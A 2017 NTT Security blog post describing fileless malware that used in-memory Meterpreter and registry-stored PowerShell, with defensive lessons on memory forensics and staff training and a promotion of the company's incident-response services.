Fileless Malware

Memory Forensics Comes into the Light

David Biser

March 02, 2017 - Posted by David Biser to Threat Intelligence

Metasploit

Recently, fileless malware has shown up in numerous LinkedIn articles, blog posts and research papers. It’s being discussed as the “new” threat to watch out for. I agree that this is an important topic, but I do not agree that it is a new threat. Rather, it has been a threat long ignored and is now being rapidly exploited by attackers.

To give some information about the threat, fileless malware is found only in memory, not in a file on disk. This attack is actually using Meterpreter code inside the physical memory of a domain controller. Along with the presence of Meterpreter, analysts discovered the use of PowerShell scripts within the Windows Registry. For those who are unaware, Meterpreter is a tool from the Metasploit framework, a free hacking tool commonly used by both penetration testers and criminal hackers. Once the attackers have successfully installed Meterpreter, they use various scripts to install a malicious service on the targeted host. After installing the malicious service, the next step is to set up tunnels to allow access to the infected host from remote hosts, thus providing the attackers with easy and continuous access to the infected host.

I do not want any readers to think that this is not a threat, it is. It is a growing threat, but not a new one. Memory analysis has been discussed for quite some time among incident response practitioners. For example, you can learn much about memory analysis from the Volatility Foundation. SANS has also incorporated memory analysis into many of their forensic training courses, and here at NTT Security we’ve written several blogs on the topic.

Although this topic isn’t new, there are several vitally important lessons that we can learn from an old threat newly exploited by attackers.

  1. Long-standing hacker tools and techniques: Those involved in incident response must be well versed in all aspects of hacking methodology. This attack doesn’t use new techniques or tools but rather old standbys. Those who are responsible for defending networks must be aware of these hacker tools, and able to identify their artifacts during an incident response event.
  2. Security staff training: Corporate security departments must provide continuous training to their security staff. The use of PowerShell for attacking networks was discussed at last year’s DefCon conference. You can see an example of this technique from Rich Kelly’s DefCon presentation, “Harness: Powershell Weaponization Made Easy (or at least easier).” Your security staff should be budgeted for annual training that is pertinent to securing your network.
  3. Open communication channels: Executive staff should routinely be made aware of current threats that are applicable to your environment. Hackers routinely target different entities with a variety of attacks. Your security staff should be following current threats and response techniques, and be able to describe their defense mechanisms to executives.
  4. Vetting third party incident responders: If you are going to engage a third party for incident response, you should be asking them about issues such as memory forensics and their ability to conduct such examinations. NTT Security provides just such a service and can help you to train your staff and respond to such threats as they develop. The NTT Security Critical Incident Response Team (CIR) and Security Engineering Research Team (SERT) utilize the most current forensic techniques and response capabilities available. For an example, refer to this blog post describing memory analysis. NTT Security resources can be a great aid to your security program.

Final Thoughts

First, even though fileless malware isn’t new, it is a threat and must be dealt with by anyone involved in defending networks. Your security staff’s skill must be greater than the attacker’s or they will find a way in.

Second, provide your security staff with the most up-to-date training available. Send them to DefCon or Black Hat. Let them learn from those who are heavily involved in attacking networks. DefCon provides the best look into hacker methodology. Take care, though, because those attending DefCon have been victims of attacks too. 

Third, take your network security seriously. Nation-state attackers, criminal enterprise hackers and others are all seeking entry to your network. They do not rest and neither should your security. Their budget and time allotted to attacking you is endless. Ensuring that your security is appropriately budgeted can help you to battle the consistent attacks.

Fourth, engage with NTT Security for a Compromise Assessment of your network.  If you’d like your network secure from threats such as fileless malware, our Critical Incident Response Team can conduct an assessment of your network, searching for threats such as this and helping you secure your network.

Don’t be a victim. Invest in your security program and defend your network as thoroughly as the attackers who are trying to get in!

References:

https://media.defcon.org/DEF%20CON%2023/DEF%20CON%2023%20presentations/DEFCON-23-Rich-Kelley-Harness-Powershell-Weaponization-Made-Easy.pdf

https://www.solutionary.com/resource-center/blog/tags/memory-analysis_1/

https://www.solutionary.com/resource-center/blog/2012/12/hunting-malware-with-memory-analysis/

https://www.solutionary.com/resource-center/blog/2015/07/more-memory-fun/

https://www.nttsecurity.com/en/who-we-are/threat-intelligence/sert

https://www.nttsecurity.com/en/what-we-do/incident-response-and-forensics

http://www.blackhat.com/

https://www.defcon.org/

Read more on Solutionary Minds about:

Voted one of the Best Computer Security Blogs 2016
NTT Security (US), Inc. (formerly Solutionary) is a security consulting and managed security services provider. The NTT Security blog is a place for IT professionals to both learn and talk about the latest in IT security and compliance.

Get the NTT Security Blog delivered to your inbox!

Enter your Email:

(We will not share your email or use it for anything else.)

LATEST TWEETS